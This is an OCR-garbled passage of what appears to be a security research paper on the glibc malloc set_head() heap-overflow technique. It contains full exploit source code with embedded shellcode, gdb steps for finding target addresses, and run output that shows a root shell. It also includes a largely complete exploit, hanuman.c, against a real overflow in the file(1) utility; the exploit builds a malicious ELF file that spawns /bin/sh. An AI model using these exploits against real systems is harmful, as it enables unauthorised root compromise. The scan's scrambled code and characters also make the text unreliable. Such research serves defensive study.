(gdb) frame 2 

#2 0x0804840a in main () 

(gdb) x Sebp+4 

OxbffffF52c: 0x4002980c 

(gdb) 

Oxbffff52c is the return location. 


get a saved 


EIP from a 


6- You can now call the exploit with the values that you have found. 


9.txt 


bashs$ 
--[ Using 0x8049a38 as the top chunk location. 
--[ Using Oxbffff52c as the return location. 


ik 


Impossible to use 0x8049990 as the return address. 
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./expl Oxbffff52c 0x8049990 0x8049a38 


instead 
sh-2.05b# exit 


exit 


bash$ 


-—----- [ 6.1.2.1 - Multiple overwrites 


the exploit. 


Using 0x8049991 


This scenario is an example of a situation where it could be possible to 
leverage the set_head() technique to make it write multiple times in 


memory. Applying this technique will help you improve the reliability of 
It will increase your chances of finding a valid return 
ocation while you are exploiting the program. 


scenario2.c 


/* 
/* 
/* 


/* 


/* 


include <stdio.h> 
include <stdlib.h> 
include <unistd.h> 


int main (int argc, char *argv[]) { 


char *bufferl; 
char *buffer2; 
unsigned long size; 


1] */ bufferl = (char *) malloc (4096); 
2) */ fgets (bufferl, 4200, stdin); 
Bi) ey do { 
size = 0; 
scanf ("Su", &size); 
4] */ buffer2 = (char *) malloc (size); 
/* 
* Random code 
Bo 
ES]. 7 free (buffer2); 
} while (size != 0); 


return 0; 


nd of scenario2.c 


Here is a brief description of the important lines in this code: 


1 


A memory region of 4096 bytes is requested. The top chunk is split 


and the request is serviced. 


A call to fgets is made. The destination buffer is not c 
if it is large enough. The top chunk can then be overwritten here. 


The program enters a loop. It reads from ’stdin’ until t 


is entered. 


A call to malloc is done with ‘’size’ as the parameter. 


T 


hecked to see 


he number '0’ 


he loop does 


not end until size equals ’0’. This gives the attacker the 


possibility of overwriting the memory multiple times. 


The buffer needs to be freed at the end of the loop. 
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oe [ 6.1.2.2 - Exploit 


xp2.c 


Exploit for scenario2.c 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <unistd.h> 


// The following #define are from malloc.c and are used 


// to compute the values for the malloc size and the top chunk size. 


define PREV_INUSE Oxl1 

define SIZE BITS Ox7 // PREV_INUSE|IS_ MMAPPED|NON_ MAIN ARE 
define SIZE SZ (sizeof(size_t)) 

define MALLOC_ALIGNMENT (2 * SIZE_SZ) 


define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) 
define MIN_CHUNK_SIZE 16 
define MINSIZE (unsigned long) ( ( (MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) 


& ~MALLOC_ALIGN_MASK) ) 

define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \ 
< MINSIZE) ?7MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \ 
& ~MALLOC_ALIGN_MASK) 


struct sethead { 
unsigned long topchunk_size; 
unsigned long malloc_size; 


}; 


/* linux_ia32_exec - CMD=/bin/id Size=68 Encoder=PexFnstenvSub 
http://metasploit.com */ 

unsigned char scode[] = 
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4£" 
"\x3d\xla\x3d\x83\xeb\xfc\xe2\xf4\x25\x36\x42\xa4\x1ld\x5b\x72\x10" 
"\x2c\xb4\xfd\x55\x60\x4e\x72\x3d\%27\x12\x78\x54\x21\xb4\xf9\x6f£" 
"\xa7\x35\xla\x3d\x4£\x12\x78\x54\x%21\x%12\x73\x59\x4E\x6a\x49\xb4" 
"\xae\xf0\x9a\x3d"; 


struct sethead * set_head_compute 


(unsigned long retloc, unsigned long retadr, unsigned long toploc) 


unsigned long check_retloc, check_retadr; 
struct sethead *shead; 


shead = (struct sethead *) malloc (8); 
if (shead == NULL) { 
fprintf (stderr, 


"--[ Could not allocate memory for sethead structure\n"); 


exit (1); 
} 


if ( (toploc % 8) !=0) f{ 
fprintf (stderr, 


"--[ Impossible to use 0x%x as the top chunk location.", 


toploc); 
toploc = toploc - (toploc % 8); 
fprintf (stderr, " Using 0x%x instead\n", toploc); 


} else 
fprintf (stderr, 
"--[ Using 0x%x as the top chunk location.\n", toploc); 
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// The minus 8 is to take care of the normalization 
// of the malloc parameter 
shead->malloc_size = (retloc toploc —- 8); 


// By adding the 8, we are able to sometimes perfectly hit 
// the return address. To hit it perfectly, retadr must be a multiple 
// of 8 + 1 (for the PREV_INUSE flag). 
shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE; 


if (shead->topchunk_size < shead->malloc_size) { 
fprintf (stderr, 
"--[ ERROR: topchunk size is less than malloc size.\n"); 
fprintf (stderr, "--[ Topchunk code will not be triggered\n"); 
exit (1); 


} 


check_retloc = (toploc + request2size (shead->malloc_size) + 4); 
if (check_retloc != retloc) { 
fprintf (stderr, 
"--[ Impossible to use 0x%x as the return location. ", retloc); 
fprintf (stderr, "Using 0x%x instead\n", check_retloc) ; 
} else 
fprintf (stderr, "--[ Using 0x%x as the return location.\n", 
retloc); 
check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS) ) 
—- request2size (shead->malloc_size)) | PREV_INUSE; 
if (check_retadr != retadr) { 


fprintf (stderr, 
"--[{ Impossible to use 0x%x as the return address.", retadr); 


fprintf (stderr, " Using 0x%x instead\n", check_retadr) ; 
} else 
fprintf (stderr, "--[ Using 0x%x as the return address.\n", 
retadr); 


return shead; 


void 

put_byte (char *ptr, unsigned char data) { 
*ptr = data; 

} 


void 
put_longword (char *ptr, unsigned long data) { 
put_byte (ptr, data); 
put_byte (ptr + 1, data >> 8); 
put_byte (ptr + 2, data >> 16); 
put_byte (ptr + 3, data >> 24); 
} 
int main (int argc, char *argv[]) { 


char *buffer; 

char malloc_size_buffer[20]; 

unsigned long retloc, retadr, toploc; 
unsigned long topchunk_size, malloc_size; 
struct sethead *shead; 

Tne a; 


if ( arge != 4) 
printf ("wrong number of arguments, exiting...\n\n"); 
printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]); 
return 1 


La 


9.txt Wed Apr 26 09:43:45 2017 22 


sscanf (argv[1], "0Ox%x", &retloc); 
sscanf (argv[2], "Ox%x", &retadr); 
sscanf (argv[3], "0Ox%x", &toploc); 


shead = set_head_compute (retloc, retadr, toploc); 
topchunk_size = shead->topchunk_size; 
free (shead); 


buffer = (char *) malloc (4108); 

memset (buffer, 0x90, 4108); 

put_longword (buffert+4100, topchunk_size); 

memcpy (buffert+4100-strlen(scode), scode, strlen (scode)); 
buffer [4104]=0x0; 


printf ("%s\n", buffer); 


for (i = 0; i < 300; i++) { 
shead = set_head_compute (retloc, retadr, toploc); 
topchunk_size = shead->topchunk_size; 
malloc_size = shead->malloc_size; 


fo) 


printf ("%Su\n", malloc_size); 


retloc = retloc 8; 
retadr = retadr + 8 


1, 


free (shead); 


} 


return 0; 


nd of exp2.c 


Here are the steps to find the memory values to use for this exploit. 


1- The first step is to generate a core dump file from the vulnerable 
program. You will then have to analyze this core dump to find the proper 
values for your exploit. 


To generate the core file, get an approximation of the top chunk location 
by getting the base address of the BSS section. Normally, the heap will 
start just after the BSS section: 


bash$S readelf -S ./scenario2|grep bss 
[22] .bss NOBITS 0804964c 00064c 000008 


The BSS section starts at 0x0804964c. Let’s call the exploit the following 
way, and remember to replace 0x0804964c for the BSS value you have found: 


bashS ./exp2 OxcOc0Oc0c0O 0x0804964c 0x0804964c | ./scenario2 

--[ Impossible to use 0x804964c as the top chunk location. Using 0x8049648 
instead 
--[ Impossible to use OxcOcOc0cO as the return location. Using Oxc0c0c0c4 
instead 
--[{ Impossible to use 0x804964c as the return address. Using 0x8049649 
instead 
--[ Impossible to use 0x804964c as the top chunk location. Using 0x8049648 
instead 
Lakers] 
—-[{ Impossible to use O0xc0c0b768 as the return location. Using Oxc0c0b76c 
instead 
--[{ Impossible to use 0x8049fa4 as the return address. Using 0x8049fal 
instead 

Segmentation fault (core dumped) 

bash# 
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2- Call gdb on that core dump file. 


bash$S gdb -q scenario2 core.2698 

Core was generated by *‘./scenario2’. 

Program terminated with signal 11, Segmentation fault. 
Reading symbols from /usr/lib/debug/libc.so.6...done. 
Loaded symbols for /usr/lib/debug/libc.so.6 

Reading symbols from /lib/ld-linux.so.2...done. 

Loaded symbols for /lib/ld-linux.so.2 


#0 _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082 
4082 set_head(remainder, remainder_siz | PREV_INUSE) ; 
(gdb) 


3- The ESI register contains the address of the top chunk. 
another register for you. 


It might be 


(gdb) info reg esi 
esi 0x804a6a8 
(gdb) 


134522536 


4—- For the return address, get a memory address at the beginning of the NOP 
cushion: 


0x8049654: 0x00000000 0x00000000 0x00000019 0x4013e698 
0x8049664: 0x4013e698 0x400898a0 0x4013d720 0x00000000 
0x8049674: 0x00000019 0x4013e6a0 0x4013e6a0 0x400899b0 
0x8049684: 0x4013d720 0x00000000 0x00000019 0x4013e6a8 
0x8049694: 0x4013e6a8 0x40089a80 0x4013d720 0x00000000 
0x80496a4: 0x00001009 0x90909090 0x90909090 0x90909090 
0x80496b4: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80496c4: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80496d4: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80496b4 is a valid address. 


5- You can now call the exploit with the values that you have found. The 
return location will be Oxbffffffc, and it will decrement with each write. 
The shellcode in exp2.c executes /bin/id. 


bashS ./exp2 Oxbffffffc 0x80496b4 0x804a6a8 | 
--[ Using 0x804a6a8 as the top chunk location. 
--[ Using Oxbffffffec as the return location. 
--[ Impossible to use 0x80496b4 as the return address. Using 0x80496b9 
instead 

ieeeeeel 

--[ Using Oxbffff6a4 as the return location. 

--[ Impossible to use 0x804a00c as the return address. Using 0x804a011 
instead 

uid=0 (root) gid=0 (root) groups=0 (root) 

bashs$ 


./scenario2 


----[ 6.2 - A real case scenario: file(1) utility 


The set_head technique was developed during the research of a security hole 
in the UNIX file(1) utility. This utility is an automatic file content 
type recognition tool found on many UNIX systems. The versions affected 
are Ian Darwin’s version 4.00 to 4.19, maintained by Christos Zoulas. This 
version is the standard version of file(1) for Linux, *BSD, and other 
systems, maintained by Christos Zoulas. 
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The main reason why so much energy was put in the development of this 
exploit is mainly because the presence of a vulnerability in this utility 
represents a high security risk for an SMTP content filter. 


An SMTP content filter is a system that acts after the SMTP server receives 
email and applies various filtering policies defined by a network 
administrator. Once the scanning process is finished, the filter decides 
whether the message will be relayed or not. 


An SMTP content filter needs to be able to call different kind of programs 
on an incoming email: 


— Dearchivers; 
- Decoders; 

— Classifiers; 
—- Antivirus; 

—- and many more 


The file(1) utility falls under the "classifiers" category. 


This attack vector gives a complete new meaning to vulnerabilities that 
were classified as low risk. 


[The author of this paper is also the maintainer of PIRANA [7], an 
exploitation framework that tests the security of an email content filter. 
By means of a vulnerability database, the content filter to be tested will 
be bombarded by various emails containing a malicious payload intended to 
compromise the computing platform. PIRANA’s goal is to test whether or not 
any vulnerability exists on the content filtering platform. 


SosSSa [ 6.2.1 - The hole 


The security vulnerability is in the file_printf() function. This function 
fills the content of the ’ms->o.buf’ buffer with the characteristics of the 
inspected file. Once this is done, the buffer is printed on the screen, 


showing what type of file was detected. Here is the vulnerable function: 


--[{ From file-4.19/src/funcs.c 


O01 protected int 
02 file_printf(struct magic_set *ms, const char *fmt, ...) 


03 { 

04 va_list ap; 

QS size_t len; 

06 char *buf; 

O07 

08 va_start(ap, fmt); 

09 if ((len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap)) >= ms-> 
o.len) { 

10 va_end(ap); 

11 if ((buf = realloc(ms->o.buf, len + 1024)) == NULL) { 
12 file _oomem(ms, len + 1024); 

13 return -1; 

14 } 

15 ms->o.ptr = buf + (ms->o.ptr - ms->o.buf); 

16 ms->o.buf = buf; 

17 ms->o.len = ms->o.size -— (ms->o.ptr - ms->o.buf); 
18 ms->o.size = len + 1024; 

19 

20 va_start(ap, fmt); 

21 len = vsnprintf(ms->o.ptr, ms->o.len, fmt, ap); 
22 } 

23 ms->o.ptr += len; 

24 ms->o.len -= len; 

25 va_end(ap); 

26 return 0; 


27 } 


9.txt Wed Apr 26 09:43:45 2017 25 


At first sight, this function seems to take good care of not overflowing 
the ’ms->o.ptr’ buffer. A first copy is done at line 09. If the 
destination buffer, ’ms->o.buf’, is not big enough to receive the character 
string, the memory region is reallocated. 


The reallocation is done at line 11, but the new size is not computed 
properly. Indeed, the function assumes that the buffer should never be 
bigger than 1024 added to the current length of the processed string. 


The real problem is at line 21. The variable ’ms->o.len’ represents the 
number of bytes left in ’ms->o.buf’. The variable ’len’, on the other 
hand, represents the number of characters (not including the trailing 
“\0’) which would have been written to the final string if enough space had 
been available. In the event that the buffer to be printed would be larger 
than ’ms->o.len’, ‘len’ would contain a value greater than ’ms->o.len’. 
Then, at line 24, ’len’ would get subtracted from ’ms->o.len’. ‘'ms-—>o.len’ 
could underflow below 0, and it would become a very big positive integer 
because /ms->o.len’ is of type ’size_t’. Subsequent vsnprintf() calls 
would then receive a very big length parameter thus rendering any bound 
checking capabilities useless. 


Sao = [ 6.2.2 - All the pieces fall into place 


[There is an interesting portion of code in the function donote()/readelf.c. 
There is a call to the vulnerable function, file_printf(), witha 
user-supplied buffer. By taking advantage of this code, it will be a lot 
simpler to write a successful exploit. Indeed, it will be possible to 
overwrite the chunk information with arbitrary values. 


--[ From file-4.19/src/readelf.c 


/* 
* Extract the program name. It is at 
* offset Ox7c, and is up to 32-bytes, 


* including the terminating NUL. 
*/ 
if (file_printf(ms, ", from ’%.31s’", 
é&nbuf[doff + Ox7c]) == -1) 


return size; 


After a couple of tries overflowing the header of the next chunk, it was 
clear that the only thing that was overflowable was the wilderness chunk. 
It was not possible to provoke a situation where a chunk that was not 
adjacent to the top chunk could be overflowable with user controllable 
data. 


The file utility suffers from this buffer overflow since the 4.00 release 
when the first version of file_printf() was introduced. A successful 
exploitation was only possible starting from version 4.16. Indeed, this 
version included a call to malloc with a user controllable variable. From 
readelf.c: 


--[ From file-4.19/src/readelf.c 


if ((nbuf = malloc((size_t)xsh_size)) == NULL) { 

file_error(ms, errno, "Cannot allocate memory" 
" £Oxr, note™).3 

return -1; 


This was the missing piece of the puzzle. Now, every condition is met to 
use the set_head() technique. 


Se a= [ 6.2.3 —- hanuman.c 
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/* 
* hanuman.c 

* 

* file(1) exploit for version 4.16 to 4.19. 
* Coded by Jean-Sebastien Guay-Leroux 

* http://www.guay-leroux.com 

* 

*/ 
/* 


Here are the steps to find the 3 memory values to use for the file(1) 
exploit. 


1- The first step is to generate a core dump file from file(1). You will 
then have to analyze this core dump to find the proper values for your 
exploit. 


To generate the core file, get an approximation of the top chunk location 
by getting the base address of the BSS section: 


bash# readelf -S /usr/bin/file 


Section Headers: 


[Nr] Name Type Addr 

[ 0] NULL 00000000 
[ 1] .interp PROGBITS 080480f4 
Pease 

[22] .bss NOBITS 0804b1e0 


The BSS section starts at 0x0804ble0. Let’s call the exploit the following 
way, and remember to replace 0x0804ble0 for the BSS value you have found: 


bash# ./hanuman OxcOc0c0c0O 0x0804ble0 0x0804ble0 mal 

--[ Using 0x804ble0 as the top chunk location. 

--[ Impossible to use OxcOcOc0c0O as the return location. Using Oxc0c0c0c4 
instead 
--[ Impossible to use 0x804ble0 as the return address. Using 0x804blel 
instead 

--[ The file has been written 

bash# file mal 

Segmentation fault (core dumped) 


2- Call gdb on that core dump file. 


bash# gdb -q file core.14854 
Core was generated by ‘file mal’. 
Program terminated with signal 11, Segmentation fault. 
Reading symbols from /usr/local/lib/libmagic.so.1...done. 
Loaded symbols for /usr/local/lib/libmagic.so.1 

Reading symbols from /1ib/i686/libc.so.6...done. 

Loaded symbols for /lib/i686/libc.so.6 

Reading symbols from /lib/ld-linux.so.2...done. 

Loaded symbols for /lib/ld-linux.so.2 

Reading symbols from /usr/lib/gconv/1IS08859-1.so...done. 
Loaded symbols for /usr/lib/gconv/1ISO8859-1.so 

#0 0x400a3d15 in mallopt () from /lib/i686/libc.so.6 
(gdb) 


3- The EAX register contains the address of the top chunk. It might be 
another register for you. 


(gdb) info reg eax 
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eax 0x80614f8 134616312 
(gdb) 


4-—- Start searching from the location of the top chunk to find the NOP 


cushion. This will be the return address. 

Ox80614f8: OxcOcOcO0cl Oxb8bc0eel OxcO0cOc0cl OxcOcOc0cl 
0x8061508: OxcOcO0c0cl OxcOc0c0cl 0x73282027 0x616e6769 
0x8061518: 0x2930206c 0x90909000 0x90909090 0x90909090 
0x8061528: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061538: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061548: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061558: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061568: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061578: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061588: 0x90909090 0x90909090 0x90909090 0x90909090 
0x8061598: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80615a8: 0x90909090 0x90909090 0x90909090 0x90909090 
0x80615b8: 0x90909090 0x90909090 

(gdb) 

0x8061558 is a valid address. 


5- To get the return location for your exploit, get a saved EIP froma 
stack frame. 


(gdb) frame 3 
#3 Ox4001f32e in file_tryelf (ms=0x804bc90, fd=3, buf=0x0, nbytes=8192) 
readelf.c:1007 


1007 if (doshn(ms, class, swap, fd, 
(gdb) x Sebp+4 

OxbfittvEias 0x400172b3 

(gdb) 


Oxbffff7fc is the return location. 


6- You can now call the exploit with the values that you have found. 


bash# ./new Oxbffff7fc 0x8061558 0x80614f8 mal 

--[ Using 0x80614f8 as the top chunk location. 

--[ Using Oxbffff7fc as the return location. 

-—-[ Impossible to use 0x8061558 as the return address. Using 0x8061559 
instead 

--[ The file has been written 

bash# file mal 

sh-2.05b 


af. 


include <stdio.h> 
include <stdlib.h> 
include <string.h> 
include <unistd.h> 
include <stdint.h> 


#define DEBUG 0 

define initial_ELF_garbage 75 

//BLF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically 
// linked 

#define initial_netbsd_garbage 22, 


at 
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//, NetBSD-style, from ’ 
#define post_netbsd_garba 


//' (signal 0) 
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ge 


28 


12 


\ 


Ge 
E 


NA 


// The following #define are from malloc.c and are used 

// to compute the values for the malloc size and the top chunk size. 

define PREV_INUSE 0x1 

define SIZE BITS 0x7 // PREV_INUSE|IS_MMAPPED |NON_MAIN_AR 

define SIZE SZ (sizeof(size_t)) 

define MALLOC_ALIGNMENT (2 * SIZE_SZ) 

#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) 

define MIN_CHUNK_SIZE 16 

define MINSIZE (unsigned long) ( ( (MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) 
& ~MALLOC_ALIGN_MASK) ) 

define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \ 
< MINSIZE) ?7MINSIZE ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) 
& ~MALLOC_ALIGN_MASK) 


CMD=/bin/sh Size=68 


// Offsets of the not 

define OFFSET_31_BYTES 2048 
define OFFSET_N_BYTES 2304 
define OFFSET_O_BYTES 2560 
define OFFSET _OVERWRITE 2816 
define OFFSET _SHELLCODE 4096 
/* linux_ia32_exec - 

http://metasploit.com */ 

unsigned char scode[] = 


ntries in the file 


Encoder=PexFnstenvSub 


"\x31\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf£4\x5b\x81\x73\x13\x27" 
"\xe2\xc0\xb3\x83\xeb\xfc\xe2\xf£4\x4d\xe9\x98\x2a\x75\x84\xa8\x9e" 
"\x44\x6b\x27\xdb\x08\x91\xa8\xb3\x4f£\xcd\xa2\xda\x49\x6b\x23\xel" 
"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a" 


"\xc6\x2£\x40\xb3"; 


struct math { 
int nnetbsd; 
int nname; 


}; 


struct sethead { 
unsigned 
unsigned 


}; 


long topchunk_size; 
long malloc_size; 


// To be a littl 
// the following 
typedef struct 

{ 


mor 


ntl6_t e_type; 
ntl6é_t e_machine; 
nt32_t e_version; 
nt32_t e_entry; 
nt32_t e_phoff; 
nt32_t e_shoff; 
nt32_t e_flags; 
ntl6é_t e_ehsize; 
ntl6_t e_phentsize; 
ntl6_t e_phnum; 
ntl6é_t e_shentsize; 
ntlé6é_t e_shnum; 
ntlé6é_t e_shstrndx; 


Geo Gee 2 GG AG Se GR Ge 


1 
a 
1 
i 
1 
1 
ub 
1 
1 
1 
ce 
1 
1 


independ 
ELF structures 


nt, we ripped 
from elf.h 


nsigned char e_ident[16]; 


\ 
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} 


E1£32_Ehdr; 


typedef struct 


{ 


} 


uint32_t sh_name; 
uint32_t sh_type; 
uint32_t sh_flags; 
uint32_t sh_addr; 
uint32_t sh_offset; 
uint32_t sh_size; 
uint32_t sh_link; 
uint32_t sh_info; 
uint32_t sh_addralign; 
uint32_t sh_entsize; 
E1f32_Shdr; 


typedef struct 


{ 


uint32_t n_namesz; 
uint32_t n_descsz; 
uint32_t n_type; 


E1£32_Nhdr; 
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1’ 


struct sethead * set_head_compute 


(unsigned long retloc 


unsigned long check_retloc, 


, unsigned long retadr, 


check_retadr; 


struct sethead *shead; 


ad *) malloc (8); 


unsigned long toploc) { 


"--[ Could not allocate memory for sethead structure\n"); 


shead = (struct sethe 
if (shead == NULL) { 
fprintf (stderr, 
exit (1); 
} 
if ( (toploc % 8) != 
fprintf (stderr, 
\ | [ 
toploc); 
toploc = toploc - 
fprintf (stderr, 
} else 
fprintf (stderr, 


"-_[ Using 0x%x as the top chunk location.\n", 


0) { 


(toploc % 


8); 
"Using O0x%x instead\n", toploc); 


// The minus 8 is to take care of the normalization 
// of the malloc parameter 


shead->malloc_size = 


// By adding th 


// the return address. 
(for the PREV_INUSE 


// of 8 +1 


(retloc toploc —- 8); 
8, we are abl 
To hit it perfectly, 


flag). 


shead->topchunk_siz 


= (retadr + 


to sometimes perfect 


Impossible to use 0x%x as the top chunk location.", 


toploc); 


ly hit 


retadr must be a multiple 


shead->malloc_size + 


EV_INUS! 


less than malloc size.\n") 


"--[ Topchunk code will not be triggered\n") 


if (shead->topchunk_size < shead->malloc_size) { 
fprintf (stderr, 
"—--[ ERROR: topchunk size is 
fprintf (stderr, 
exit (1); 
} 
check_retloc = (toploc + request2size 
if (check_retloc != retloc) { 
fprintf (stderr, 


| ee [ 


(shead->malloc_size) 


Impossible to use O0x%x as the return location. 


+ 4); 


W 


Ei « 
Pr 


1’ 


, vetloc); 
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/* 


fprintf (stderr, 
} else 
fprintf (stderr, 
retloc); 


check_retadr 


- request2size 
(check_retadr 


if 


fprintf ( 


| ee aed [ 


fprintf ( 


} else 


fprintf ( 


return shead; 


Not CPU friendly 


*/ 
stru 
comp 


math = 


void 
put_. 


} 


ct math * 
ute (int o 


int accumu 
int i, Jj; 


ffs 


lat 


=i 


'= ret 
stderr, 


Impossible to use 0x%x as the return address.", 
"Using 0x%x instead\n", 


stderr, 


stderr, 


retadr); 


et) { 


or = 0; 


struct math *math; 


if (math 
printf 


exit 


for (i = 1; 


accum 
accum 


accum 


if 


} 


(struct math *) 


NULL) { 


adr) 


{ 


malloc 


Wed Apr 26 09:43:45 2017 


(8); 


(shead->topchunk_size & 
(shead->malloc_size) ) 


30 


"Using 0x%x instead\n", 


check_retloc); 


“(SIZE_BITS 


PRI 


check_retadr) ; 


) 
EV_INUSE; 


"-_[ Using 0x%x as the return location.\n", 


retadr); 


"-_[ Using 0x%x as the return address.\n", 


("--[ Could not allocate memory for math structure\n"); 


(1); 


Oo; j < 


ulator 

ulator += 
ulator += 
fe) 
WI 


lator += 


ulator += 


= Oy 


i < 100;i++) { 


1’ 


(i * 31); 


Jey, 


initial 


(i. * 


Ii 


(accumulator == offset) { 


m 
m 


ath->nnetb 
ath->nname 


sd = 
= JF 


return math; 


// Failed to find a value 


return 0; 


byte 


(char *ptr, 


*otr = data; 


a 


unsigned char data) 


{ 


_ELF_garbage; 

(initial_netbsd_garbage 
post_netbsd_garbage) ); 
initial_ 


netbsd_garbage; 
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void 
put_ 


FILE 
nN 


} 


longword (char *ptr, unsigned long data) { 
put_byte (ptr, data); 
put_byte (ptr + 1, data >> 8) 
( 
( 


, 
put_byte (ptr + 2, data >> 16); 
put_byte (ptr + 3, data >> 24); 

* 

_file (char *filename) { 
FILE *fp; 
fp = fopen ( filename , "w" ); 
if ('fp) { 


perror ("Cant open file"); 
exit (1); 
} 


return fp; 


void 
usage (char *progname) { 


printf ("\nTo use:\n"); 
printf ("Ss <return location> <return address> ", progname) ; 
printf ("<topchunk location> <output filename>\n\n"); 


exit (1); 


main (int argc, char *argv[]) { 


FILE *fp; 

1£32_Ehdr *elfhdr; 

1£32_Shdr *elfshdr; 

1£32_Nhdr *elfnhdr; 

har *filename; 

har *buffer, *ptr; 

ne 1; 

truct math *math; 

truct sethead *shead; 

nt left_bytes; 

nsigned long retloc, retadr, toploc; 
nsigned long topchunk_size, malloc_size; 


Ae we 


GaOrMNNRAOA 


if ( argc != 5) { 
usage ( argv[0] ); 


} 


sscanf (argv[1], "0Ox%x", &retloc); 
sscanf (argv[2], "0Ox%x", &retadr); 
sscanf (argv[3], "0Ox%x", &toploc); 


filename = (char *) malloc (256); 
if (filename == NULL) { 
printf ("--[ Cannot allocate memory for filename... 


exit (1); 
} 
strncpy (filename, argv[4], 255); 


buffer = (char *) malloc (8192); 
if (buffer == NULL) { 


.\n"); 
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printf ("--[ Cannot allocate memory for file buffer\n"); 
exit (1); 
} 
memset (buffer, 0, 8192); 
math = compute (1036); 
if (!math) { 
printf ("--[ Unable to compute a value\n"); 
exter (Lh); 
} 
shead = set_head_compute (retloc, retadr, toploc); 


topchunk_size 
malloc_size 


shead->topchunk_size; 
shead->malloc_size; 


ptr 
elfhdr 


buffer; 
= (ELE£32_] 


Ehdr *) ptr; 


// Fill our ELF header 
sprintf (elfhdr->e_ident, "\x7£\x45\x4c\x46\x01\x01\x01"); 


lfhdr->e_type = 23 // ET_EXEC 
elfhdr->e_machine = 3+ // EM_386 
elfhdr->e_version = 1; // EV_CURRENT 
lfhdr->e_entry = 0; 
elfhdr->e_phoff = O; 
elfhdr->e_shoff = 52 
elfhdr->e_flags = 0; 
lfhdr->e_ehsize = 52 
lfhdr->e_phentsize = 32; 
elfhdr->e_phnum = Oy 
lfhdr->e_shentsize = 40; 
elfhdr->e_shnum = math->nnetbsd + 2; 
elfhdr->e_shstrndx = 0; 
ptr += elfhdr->e_ehsize; 
elfshdr = (E1f32_Shdr *) ptr; 
// This loop lets us eat an arbitrary number of bytes in ms->o.buf 
left_bytes math->nname; 
for (i = 0; i < math->nnetbsd; itt) { 
elfshdr->sh_name 0; 
elfshdr->sh_type = 7; // SHT_NOTE 
elfshdr->sh_flags = 0; 
elfshdr->sh_addr = 0; 
elfshdr->sh_size = 256; 
elfshdr->sh_link = 0; 
elfshdr->sh_info = «0: 
elfshdr->sh_addralign = 0; 
elfshdr->sh_entsiz O:* 
if (left_bytes > 31) { 
// filename == 31 
elfshdr->sh_offset = OFFSET_31_BYTES; 
left_bytes -= 31; 
} else if (left_bytes != 0) { 
// filename < 31 && != 0 
elfshdr->sh_offset = OFFSET_N_BYTES; 
left_bytes = 0; 
} else { 
// filename == 
elfshdr->sh_offset = OFFSET_0O_ BYTES; 


} 


// The first section header will also let us load 
// the shellcode in memory :) 
// Indeed, by requesting a large memory block, 
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// the topchunk will be splitted, and this memory region 
// will be left untouched until we need it. 
// We assume its name is 31 bytes long. 
Dts (0). 
elfshdr->sh_size = 4096; 
elfshdr->sh_offset = OFFSET _SHELLCODE; 


} 


elfshdr++; 


// This section header entry is for the data that will 


// overwrite the topchunk size pointer 
elfshdr->sh_name = 40% 

elfshdr->sh_type = 7; // SHT_NOTE 
elfshdr->sh_flags = 0; 

elfshdr->sh_addr = 0; 

elfshdr->sh_offset = OFFSET_OVERWRITE; 
elfshdr->sh_size = 256; 

elfshdr->sh_link = 0; 

elfshdr->sh_info = 0; 

elfshdr->sh_addralign = 0; 

elfshdr->sh_entsiz = 0; 

elfshdr++; 

// This section header entry triggers the call to malloc 
// with a user supplied length. 

// It is a requirement for the set_head technique to work 
elfshdr->sh_name = 0; 

elfshdr->sh_type = 7; // SHT_NOTE 
elfshdr->sh_flags = 0; 

elfshdr->sh_addr = 0; 

elfshdr->sh_offset = OFFSET_N_BYTES; 
elfshdr->sh_size = malloc_size; 
elfshdr->sh_link = 0; 

elfshdr->sh_info = 0; 

elfshdr->sh_addralign = 0; 

elfshdr->sh_entsiz = 0; 

elfshdr++; 

// This note entry lets us eat 31 bytes + overhead 
elfnhdr = (E1f32_Nhdr *) (buffer + OFFSET_31_BYTES); 
elfnhdr->n_namesz = 12; 

elfnhdr->n_descsz = 12; 

elfnhdr->n_type eel Or 

ptr = buffer + OFFSET_31_BYTES + 12; 

sprintf (ptr, "NetBSD-CORE") ; 

sprintf (buffer + OFFSET_31_BYTES + 24 + Ox7c, 


"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB") ; 


// This note entry lets us eat an arbitrary number of bytes + overhead 


elfnhdr = (E1f32_Nhdr *) (buffer + OFFSET_N_BYTES) ; 
elfnhdr->n_namesz = 12; 
elfnhdr->n_descsz = 12; 
elfnhdr->n_type = 15 


ptr = buffer + OFFSET_N_BYTES + 12; 

sprintf (ptr, "NetBSD-CORE") ; 

for (i = 0; i < (math->nname % 31); itt) 
buffer [OFFSET_N_ BYTES+24+0x7cti]='B’; 


// This note entry lets us eat 0 bytes + overhead 
elfnhdr = (EBE1f£32_Nhdr *) (buffer + OFFSET_O_BYTES) ; 
elfnhdr->n_namesz = 12; 


9.txt Wed Apr 26 09:43:45 2017 34 


elfnhdr->n_descsz = 12 
elfnhdr->n_type = 1; 

ptr = buffer + OFFSET_O_BYTES + 12; 
